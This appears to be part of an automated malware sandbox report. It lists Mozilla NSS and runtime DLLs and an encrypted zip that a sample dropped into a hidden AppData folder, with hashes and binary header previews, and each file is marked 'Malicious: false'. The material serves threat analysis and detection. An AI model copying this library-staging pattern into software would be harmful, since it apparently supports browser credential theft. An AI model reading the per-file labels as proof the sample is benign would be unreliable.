SSDEEP:	384:8ZSWWVgWPhWFe3di00GftpBjnlfemHlUG+zITA+0:XRNoibernAA+0
MD5:	849F2C3EBF1FCBA33D16153692D5810F
SHA1:	1F8EDA52D31512EBFDD546BE60990B95C8E28BFB
SHA-256:	69885FD581641B4A680846F93C2DD21E5DD8E3BA37409783BC5B3160A919CB5D
SHA-512:	44DC4200A653363C9A1CB2BDD3DA5F371F7D1FB644D1CE2FF5FE57D939B35130AC8AE27A3F07B82B3428233F07F974628027B0E6B6F70F7B2A8D259BE95222F5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....OI...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v....................OI........7...d...d........OI........d................OI....................RSDS...s..,E.w.9I..D....api-ms-win-crt-time-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.........OI............H...H...(...H...h... ...=...\...z.......................8...V...s.......................&...D...a...~.......................?...b.......................!...F...k.......................0...N...k...................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-utility-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.127951145819804
Encrypted:	false
SSDEEP:	192:QqfHQdu3WIghWG4U9lYdsNtL/123Ouo+Uggs/nGfe4pBjSb8Z9Wh0txKdmVWQ4Cg:/fBWPhWF+esnhi00GftpBjLBemHlP55q
MD5:	B52A0CA52C9C207874639B62B6082242
SHA1:	6FB845D6A82102FF74BD35F42A2844D8C450413B
SHA-256:	A1D1D6B0CB0A8421D7C0D1297C4C389C95514493CD0A386B49DC517AC1B9A2B0
SHA-512:	18834D89376D703BD461EDF7738EB723AD8D54CB92ACC9B6F10CBB55D63DB22C2A0F2F3067FE2CC6FEB775DB397030606608FF791A46BF048016A1333028D0A4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....!5............!......................... ...............................0.......4....@.............................^............ ..................8=..............T............................................................................text...n........................... ..`.rsrc........ ......................@..@v....................!5.........:...d...d........!5.........d................!5.....................RSDS............k.....api-ms-win-crt-utility-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......^....edata... ..`....rsrc$01....` .......rsrc$02.....................!5.....d...............8.......(...................#...<...U...l...............................+...@...[...r...................................4...I..._.......................3...N...e...\|.......................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\breakpadinjector.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	117712
Entropy (8bit):	6.598338256653691
Encrypted:	false
SSDEEP:	3072:9b9ffsTV5n8cSQQtys6FXCVnx+IMD6eN07e:P25V/QQs6WTMex7e
MD5:	A436472B0A7B2EB2C4F53FDF512D0CF8
SHA1:	963FE8AE9EC8819EF2A674DBF7C6A92DBB6B46A9
SHA-256:	87ED943D2F06D9CA8824789405B412E770FE84454950EC7E96105F756D858E52
SHA-512:	89918673ADDC0501746F24EC9A609AC4D416A4316B27BF225974E898891699B630BB18DB32432DA2F058DC11D9AF7BAF95D067B29FB39052EE7C6F622718271B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s..y7.{7.{7.{..x+>.{..~+I.{...+%.{.x+$.{..+'.{.~+..{..z+4.{7.zA.{..~+>.{..{+6.{...6.{..y+6.{Rich7.{........PE..L....@.\.........."!................t........0.......................................S....@.........................P...P.......(...................................`...T...............................@............0..D............................text............................... ..`.rdata...l...0...n... ..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\freebl3.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	334288
Entropy (8bit):	6.808908775107082
Encrypted:	false
SSDEEP:	6144:6cYBCU/bEPU6Rc5xUqc+z75nv4F0GHrIraqqDL6XPSed:67WRCB7zl4F0I4qn6R
MD5:	60ACD24430204AD2DC7F148B8CFE9BDC
SHA1:	989F377B9117D7CB21CBE92A4117F88F9C7693D9
SHA-256:	9876C53134DBBEC4DCCA67581F53638EBA3FEA3A15491AA3CF2526B71032DA97
SHA-512:	626C36E9567F57FA8EC9C36D96CBADEDE9C6F6734A7305ECFB9F798952BBACDFA33A1B6C4999BA5B78897DC2EC6F91870F7EC25B2CEACBAEE4BE942FE881DB01
Malicious:	false
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L....@.\.........."!.........f...............................................p............@.........................p...P............@..x....................P......0...T...............................@...............8............................text...d........................... ..`.rdata..............................@..@.data...,H..........................@....rsrc...x....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldap60.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	132048
Entropy (8bit):	6.627391684128337
Encrypted:	false
SSDEEP:	3072:qgXCFTvwqiiynFa6zqeqQZ06DdEH4sq9gHNaIkIQhEwe:qdvwqMFbOePIP/zkIQ2h
MD5:	5A49EBF1DA3D5971B62A4FD295A71ECF
SHA1:	40917474EF7914126D62BA7CDBF6CF54D227AA20
SHA-256:	2B128B3702F8509F35CAD0D657C9A00F0487B93D70336DF229F8588FBA6BA926
SHA-512:	A6123BA3BCF9DE6AA8CE09F2F84D6D3C79B0586F9E2FD0C8A6C3246A91098099B64EDC2F5D7E7007D24048F10AE9FC30CCF7779171F3FD03919807EE6AF76809
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q...?S..?S..?S..S..?S\|.>R..?S;..S..?S\|.<R..?S\|.:R..?S\|.;R..?S..>R..?S..>S..?Sn.;R.?Sn.?R..?Sn..S..?Sn.=R..?SRich..?S........................PE..L....@.\.........."!.........f...... ........................................0............@.............................................x.................... ......p...T..............................@...............\............................text...:........................... ..`.rdata...@.......B..................@..@.data...l...........................@....rsrc...x...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldif60.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20432
Entropy (8bit):	6.337521751154348
Encrypted:	false
SSDEEP:	384:YxfML3ALxK0AZEuzOJKRsIFYvDG8A3OPLonw4S:0fMmxFyO4RpGDG8MjS
MD5:	4FE544DFC7CDAA026DA6EDA09CAD66C4
SHA1:	85D21E5F5F72A4808F02F4EA14AA65154E52CE99
SHA-256:	3AABBE0AA86CE8A91E5C49B7DE577AF73B9889D7F03AF919F17F3F315A879B0F
SHA-512:	5C78C5482E589AF7D609318A6705824FD504136AEAAC63F373E913DA85FA03AF868669534496217B05D74364A165D7E08899437FCC0E3017F02D94858BA814BB
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........9..j..j..j...j..j^..k..j^..k..j^..k..j^..k..j...k..j..j..jL..k..jL..k..jL.bj..jL..k..jRich..j........................PE..L....<.\.........."!................Y........0...............................p......r.....@..........................5.......6.......P..x............2.......`..x....0..T...........................(1..@............0...............................text............................... ..`.rdata.......0......................@..@.data........@.......&..............@....rsrc...x....P.......,..............@..@.reloc..x....`.......0..............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\lgpllibs.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	55760
Entropy (8bit):	6.738700405402967
Encrypted:	false
SSDEEP:	1536:LxsBS3Q6j+37mWT7DT/GszGrn7iBCmjFCOu:LxTBcmWT7X/Gszen7icmjFtu
MD5:	56E982D4C380C9CD24852564A8C02C3E
SHA1:	F9031327208176059CD03F53C8C5934C1050897F
SHA-256:	7F93B70257D966EA1C1A6038892B19E8360AADD8E8AE58E75EBB0697B9EA8786
SHA-512:	92ADC4C905A800F8AB5C972B166099382F930435694D5F9A45D1FDE3FEF94FAC57FD8FAFF56FFCFCFDBC61A43E6395561B882966BE0C814ECC7E672C67E6765A
Malicious:	false
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...........l...l...l.......l..~....l..9...l..~....l..~....l..~....l.......l..l....l...l...l...l...l..l....l..l....l..l....l..l..l..l....l..Rich.l..........................PE..L...z@.\.........."!.........2......................................................t.....@...........................................x...............................T...............................@............................................text.............................. ..`.rdata..>...........................@..@.data...............................@....rodata.8...........................@..@.rsrc...x...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\libEGL.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22480
Entropy (8bit):	6.528357540966124
Encrypted:	false
SSDEEP:	384:INZ9mLVDAffJJKAtn0mLAb8X3FbvDG8A3OPLonzvGb:4mx+fXvn4YFrDG8MKb
MD5:	96B879B611B2BBEE85DF18884039C2B8
SHA1:	00794796ACAC3899C1FB9ABBF123FEF3CC641624
SHA-256:	7B9FC6BE34F43D39471C2ADD872D5B4350853DB11CC66A323EF9E0C231542FB9
SHA-512:	DF8F1AA0384A5682AE47F212F3153D26EAFBBF12A8C996428C3366BEBE16850D0BDA453EC5F4806E6A62C36D312D37B8BBAFF549968909415670C9C61A6EC49A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../...N{.N{.N{.6..N{.F,z.N{.F,x.N{.F,~.N{.F,..N{..z.N{.T-z.N{.Nz..N{.T-~.N{.T-{.N{.T-..N{.T-y.N{.Rich.N{.........................PE..L...aA.\.........."!.........(............... ...............................p......~.....@..........................%..........d....P..x............:.......`.......!..T............................"..@............ ...............................text... ........................... ..`.rdata....... ......................@..@.data........@.......2..............@....rsrc...x....P.......4..............@..@.reloc.......`.......8..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83408
Entropy (8bit):	6.436278889454398
Encrypted:	false
SSDEEP:	1536:CNr03+TtFKytqB0EeCsu1sW+cdQOTki9jHiU:CNrDKHBBjXQSki9OU
MD5:	385A92719CC3A215007B83947922B9B5
SHA1:	38DE6CA70CEE1BAD84BED29CE7620A15E6ABCD10
SHA-256:	06EF2010B738FBE99BCDEBBF162473A4EE090678BB6862EEB0D4C7A8C3F225BB
SHA-512:	9F0DFF00C7E72D7017AECE3FA5C31A9C2C2AA0CCC6606D2561CE8D36A4A1F0AB8DC452E2C65E9F4B6CD32BBB8ADA1FF7C865126A5F318719579DB763E4C4183F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........mR;...;...;.......2.......G.......).......*.......".......4.......>...;...n.......:.......:.......:.......:...Rich;...........................PE..L....=.\.........."!.........................................................`......>.....@.............................l.......<....@..P............(.......P..d...0...T...............................@............................................text............................... ..`.rdata..Z[.......\..................@..@.data........ ......................@....rsrc...P....@......................@..@.reloc..d....P......................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32_InUse.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83408
Entropy (8bit):	6.436278889454398
Encrypted:	false
SSDEEP:	1536:CNr03+TtFKytqB0EeCsu1sW+cdQOTki9jHiU:CNrDKHBBjXQSki9OU
MD5:	385A92719CC3A215007B83947922B9B5
SHA1:	38DE6CA70CEE1BAD84BED29CE7620A15E6ABCD10
SHA-256:	06EF2010B738FBE99BCDEBBF162473A4EE090678BB6862EEB0D4C7A8C3F225BB
SHA-512:	9F0DFF00C7E72D7017AECE3FA5C31A9C2C2AA0CCC6606D2561CE8D36A4A1F0AB8DC452E2C65E9F4B6CD32BBB8ADA1FF7C865126A5F318719579DB763E4C4183F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........mR;...;...;.......2.......G.......).......*.......".......4.......>...;...n.......:.......:.......:.......:...Rich;...........................PE..L....=.\.........."!.........................................................`......>.....@.............................l.......<....@..P............(.......P..d...0...T...............................@............................................text............................... ..`.rdata..Z[.......\..................@..@.data........ ......................@....rsrc...P....@......................@..@.reloc..d....P......................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozglue.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	137168
Entropy (8bit):	6.784614237836286
Encrypted:	false
SSDEEP:	3072:Z6s2DIGLXlNJJcPoN0j/kVqhp1qt/TXTv7q1D2JJJvPhrSeXZ5dR:MszGLXlNrE/kVqhp12/TXTjSD2JJJvPt
MD5:	EAE9273F8CDCF9321C6C37C244773139
SHA1:	8378E2A2F3635574C106EEA8419B5EB00B8489B0
SHA-256:	A0C6630D4012AE0311FF40F4F06911BCF1A23F7A4762CE219B8DFFA012D188CC
SHA-512:	06E43E484A89CEA9BA9B9519828D38E7C64B040F44CDAEB321CBDA574E7551B11FEA139CE3538F387A0A39A3D8C4CBA7F4CF03E4A3C98DB85F8121C2212A9097
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........U..;..;..;.....;.W....;...8..;...?..;...:..;...>..;...:...;..:.w.;...?..;...>..;...;..;......;...9..;.Rich.;.........................PE..L...{>.\.........."!.....z...................................................@......j.....@A........................@...t.......,.... ..x....................0..l.......T...................T.......h...@...................l........................text....x.......z.................. ..`.rdata..^e.......f...~..............@..@.data...............................@....didat..8...........................@....rsrc...x.... ......................@..@.reloc..l....0......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\msvcp140.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	440120
Entropy (8bit):	6.652844702578311
Encrypted:	false
SSDEEP:	12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
MD5:	109F0F02FD37C84BFC7508D4227D7ED5
SHA1:	EF7420141BB15AC334D3964082361A460BFDB975
SHA-256:	334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
SHA-512:	46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nss3.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1245136
Entropy (8bit):	6.766715162066988
Encrypted:	false
SSDEEP:	24576:ido5Js2a56/+VwJebKj5KYFsRjzx5ZxKV6D1Z4Go/LCiytoxq2Zwn5hCM4MSRdY8:Q2aY4w6aozx5ZWMM7yew8MSRK1y
MD5:	02CC7B8EE30056D5912DE54F1BDFC219
SHA1:	A6923DA95705FB81E368AE48F93D28522EF552FB
SHA-256:	1989526553FD1E1E49B0FEA8036822CA062D3D39C4CAB4A37846173D0F1753D5
SHA-512:	0D5DFCF4FB19B27246FA799E339D67CD1B494427783F379267FB2D10D615FFB734711BAB2C515062C078F990A44A36F2D15859B1DACD4143DCC35B5C0CEE0EF5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c.4.'.Z.'.Z.'.Z.....3.Z...[.%.Z.B..#.Z...Y.*.Z..._.-.Z...^.,.Z...[./.Z..[.$.Z.'.[...Z..^.-.Z..Z.&.Z...&.Z..X.&.Z.Rich'.Z.........................PE..L....@.\.........."!.........................................................@......Q.....@................................x=..T.......p........................\|......T...........................h...@............................................text............................... ..`.rdata...Q.......R..................@..@.data...tG...`..."...>..............@....rsrc...p............`..............@..@.reloc...\|.......~...d..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssckbi.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	336336
Entropy (8bit):	7.0315399874711995
Encrypted:	false
SSDEEP:	6144:8bndzEL04gF85K9autIMyEhZ/V3psPyHa9tBe1:8bndzEL04pnutIMyAp2z9tBe1
MD5:	BDAF9852F588C86B055C846B53D4C144
SHA1:	03B739430CF9EADE21C977B5B416C4DD94528C3B
SHA-256:	2481DA1C459A2429A933D19AD6AE514BD2AE59818246DDB67B0EF44146CED3D8
SHA-512:	19D9A952A3DF5703542FA52A5A780C2E04D6A132059F30715954EAC40CD1C3F3B119A29736D4A911BE85086AFE08A54A7482FA409DFD882BAC39037F9EECD7EF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pi.Pi.Pi.(..Pi.F2h.Pi.F2j.Pi.F2l.Pi.F2m.Pi.0h.Pi.T3h.Pi.Ph.Pi.T3m.Pi.T3i.Pi.T3..Pi.T3k.Pi.Rich.Pi.........PE..L....@.\.........."!.........`......q........................................@...........@.............................P.......d.......x.......................t)..p...T..............................@............................................text.............................. ..`.rdata..>...........................@..@.data....N.......L..................@....rsrc...x...........................@..@.reloc..t).......*..................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssdbm3.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	92624
Entropy (8bit):	6.639527605275762
Encrypted:	false
SSDEEP:	1536:YvNGVOt0VjOJkbH8femxfRVMNKBDuOQWL1421GlkxERC+ANcFZoZ/6tNRCwI41Pc:+NGVOiBZbcGmxXMcBqmzoCUZoZebHPAT
MD5:	94919DEA9C745FBB01653F3FDAE59C23
SHA1:	99181610D8C9255947D7B2134CDB4825BD5A25FF
SHA-256:	BE3987A6CD970FF570A916774EB3D4E1EDCE675E70EDAC1BAF5E2104685610B0
SHA-512:	1A3BB3ECADD76678A65B7CB4EBE3460D0502B4CA96B1399F9E56854141C8463A0CFCFFEDF1DEFFB7470DDFBAC3B608DC10514ECA196D19B70803FBB02188E15E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Z.Y.4.Y.4.Y.4.P...U.4...5.[.4..y.Q.4...7.X.4...1.S.4...0.R.4.{.5.[.4...5.Z.4.Y.5...4...0.A.4...4.X.4....X.4...6.X.4.RichY.4.........................PE..L....@.\.........."!.........0...............0......................................*q....@......................... ?......(@.......`..x............L.......p.......:..T...........................(;..@............0..X............................text............................... ..`.rdata..D....0... ..................@..@.data........P.......>..............@....rsrc...x....`.......@..............@..@.reloc.......p.......D..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\pB4pD1lB4sD3.zip Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	2828315
Entropy (8bit):	7.998625956067725
Encrypted:	true
SSDEEP:	49152:tiGLaX5/cgbRETlc0EqgSVAx07XZiEi4qiefeEJGt5ygL0+6/qax:t9OX9alwJSVP1fnefekGt5CP
MD5:	1117CD347D09C43C1F2079439056ADA3
SHA1:	93C2CE5FC4924314318554E131CFBCD119F01AB6
SHA-256:	4CFADA7EB51A6C0CB26283F9C86784B2B2587C59C46A5D3DC0F06CAD2C55EE97
SHA-512:	FC3F85B50176C0F96898B7D744370E2FF0AA2024203B936EB1465304C1C7A56E1AC078F3FDF751F4384536602F997E745BFFF97F1D8FF2288526883185C08FAF
Malicious:	false
Preview:	PK.........znN<..{r....i......nssdbm3.dll...\|...8...N..Y..6.$J.....$1...D .a.....jL.V..C...N.;....}./............$...Z,T.R.qc...Ec.=................;..{..s....p.`..A.?M.....W!.....a..?N...~e.A..W.o.....[.}...,...;.+\....Jw.\|...k.......<yR.^.E.o.nxs.c...=V....,..F....cu.....w.O..[..u.{..<.w....7P...{..K~..E..w...c...z^..[Z....6.G.V.2..+.n4......1M.......w{f..nJL..{. d......M..+.. ......./.)..$X!......L..K.`.M...w.I..LA8r.IX...r...87..}........<.].r.....TWm......b6/._....a..W.lB...3.n.._...j....o.Mz.._Q........8....K............gr..L..H...v....6[...4I...{.1g..<..>M..$G.&Y........-.....O..9\...,t..W.m.X ..Y.3....S<#}.".>.0RBg,...lh.s..o.....r.p8...)..3..K.v....ds.n3.+]....+....krMu._.Y\..../8T......&.BC.".u..;..e.k u$......~`.{.!.M...\W.Y.37+nQ.Z.*...3\G..5d....Z.hVL..Z.\|k.5...XF.Y..lVVW..C..\|.....b..\.Z...m. ..0...P.F8{].U.p..RW,n...MM.....s..._@..>Q.. ...N.>.T?WM....)9B.............mVW.......b.6{..\|!......O....M....>.>.$\.%..L.zF.l...3

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\prldap60.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	24016
Entropy (8bit):	6.532540890393685
Encrypted:	false
SSDEEP:	384:TQJMOeAdiNcNUO3qgpw6MnTmJk0llEEHAnDl3vDG8A3OPLondJJs2z:KMaNqb6MTmVllEK2p/DG8MlsQ
MD5:	6099C438F37E949C4C541E61E88098B7
SHA1:	0AD03A6F626385554A885BD742DFE5B59BC944F5
SHA-256:	46B005817868F91CF60BAA052EE96436FC6194CE9A61E93260DF5037CDFA37A5
SHA-512:	97916C72BF75C11754523E2BC14318A1EA310189807AC8059C5F3DC1049321E5A3F82CDDD62944EA6688F046EE02FF10B7DDF8876556D1690729E5029EA414A9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:`wq[.$q[.$q[.$x#.$s[.$.9.%s[.$.9.%p[.$.9.%{[.$.9.%z[.$S;.%s[.$.8.%t[.$q[.$=[.$.8.%t[.$.8.%p[.$.8.$p[.$.8.%p[.$Richq[.$........PE..L....@.\.........."!..... ... .......%.......0...............................p......./....@..........................5......p7..x....P..x............@.......`..$...`1..T............................1..@............0..,............................text...2........ .................. ..`.rdata.......0.......$..............@..@.data...4....@.......4..............@....rsrc...x....P.......8..............@..@.reloc..$....`.......<..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\qipcap.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	16336
Entropy (8bit):	6.437762295038996
Encrypted:	false
SSDEEP:	192:aPgr1ZCb2vGJ7b20qKvFej7x0KDWpH3vUA397Ae+PjPonZwC7Qm:aYpZPGJP209F4vDG8A3OPLonZwC7X
MD5:	F3A355D0B1AB3CC8EFFCC90C8A7B7538
SHA1:	1191F64692A89A04D060279C25E4779C05D8C375
SHA-256:	7A589024CF0EEB59F020F91BE4FE7EE0C90694C92918A467D5277574AC25A5A2
SHA-512:	6A9DB921156828BCE7063E5CDC5EC5886A13BD550BA8ED88C99FA6E7869ECFBA0D0B7953A4932EB8381243CD95E87C98B91C90D4EB2B0ACD7EE87BE114A91A9E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s6.7W..7W..7W..>/..5W...5..5W...5..6W...5..>W...5..<W...7..4W..7W..*W...4..6W...4`.6W...4..6W..Rich7W..................PE..L....B.\.........."!......................... ...............................`.......r....@..................................$..P....@..x............".......P.. .... ..T............................ ..@............ ..h............................text...P........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...x....@......................@..@.reloc.. ....P....... ..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\softokn3.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	144848
Entropy (8bit):	6.54005414297208
Encrypted:	false
SSDEEP:	3072:8Af6suip+I7FEk/oJz69sFaXeu9CoT2nIVFetBW3D2xkEMk:B6POsF4CoT2OeYMzMk
MD5:	4E8DF049F3459FA94AB6AD387F3561AC
SHA1:	06ED392BC29AD9D5FC05EE254C2625FD65925114
SHA-256:	25A4DAE37120426AB060EBB39B7030B3E7C1093CC34B0877F223B6843B651871
SHA-512:	3DD4A86F83465989B2B30C240A7307EDD1B92D5C1D5C57D47EFF287DC9DAA7BACE157017908D82E00BE90F08FF5BADB68019FFC9D881440229DCEA5038F61CD6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L....@.\.........."!.........b...............................................P.......\|....@..........................................0..x....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...D.......F..................@..@.data........ ......................@....rsrc...x....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ucrtbase.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142072
Entropy (8bit):	6.809041027525523
Encrypted:	false
SSDEEP:	24576:bZBmnrh2YVAPROs7Bt/tX+/APcmcvIZPoy4TbK:FBmF2lIeaAPgb
MD5:	D6326267AE77655F312D2287903DB4D3
SHA1:	1268BEF8E2CA6EBC5FB974FDFAFF13BE5BA7574F
SHA-256:	0BB8C77DE80ACF9C43DE59A8FD75E611CC3EB8200C69F11E94389E8AF2CEB7A9
SHA-512:	11DB71D286E9DF01CB05ACEF0E639C307EFA3FEF8442E5A762407101640AC95F20BAD58F0A21A4DF7DBCDA268F934B996D9906434BF7E575C4382281028F64D4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E..............o........p..................................................................Rich............................PE..L....3............!.....Z...........=.......p...............................p............@A........................`................................0..8=......$... ...T...........................H...@............................................text....Z.......Z.................. ..`.data........p.......^..............@....idata..6............l..............@..@.rsrc...............................@..@.reloc..$...........................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\vcruntime140.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83784
Entropy (8bit):	6.890347360270656
Encrypted:	false
SSDEEP:	1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
MD5:	7587BF9CB4147022CD5681B015183046
SHA1:	F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
SHA-256:	C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
SHA-512:	0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

